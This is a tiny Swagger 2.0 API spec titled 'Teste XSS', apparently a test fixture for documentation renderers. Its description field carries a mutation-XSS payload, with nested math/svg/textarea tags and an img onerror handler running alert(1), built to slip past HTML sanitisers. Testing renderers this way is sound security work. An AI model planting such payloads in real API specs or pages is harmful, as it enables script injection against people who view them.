swagger: '2.0'
info:
  title: Teste XSS
  version: 1.0.0
  description: |
    <math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><textarea><a title="</textarea><img src='#' onerror='alert(1)'>">
paths:
  /ping:
    get:
      responses:
        '200':
          description: OK
